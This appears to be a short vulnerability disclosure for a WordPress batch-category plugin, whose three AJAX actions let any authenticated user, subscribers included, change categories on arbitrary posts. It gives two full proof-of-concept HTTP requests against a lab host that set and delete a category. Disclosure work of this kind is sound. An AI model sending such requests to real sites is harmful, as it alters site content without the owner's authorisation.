The plugin defines 3 custom AJAX actions, which both require authentication but are available for all roles. As a result, any authenticated user (including simple subscribers) can add/set/delete arbitrary categories to posts.
Set the category 107 to the post 1537: POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://wp.lab/wordpress/wp-admin/tools.php?page=batch-cat%2Fadmin.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 50 Origin: http://wp.lab Connection: close Cookie: [any authenticated user] action=bcat_set_category&post;_ids=1537&cat;_ids=107 Delete the category 107 from the post 1537: POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://wp.lab/wordpress/wp-admin/tools.php?page=batch-cat%2Fadmin.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 50 Origin: http://wp.lab Connection: close Cookie: [any authenticated user] action=bcat_del_category&post;_ids=1537&cat;_ids=107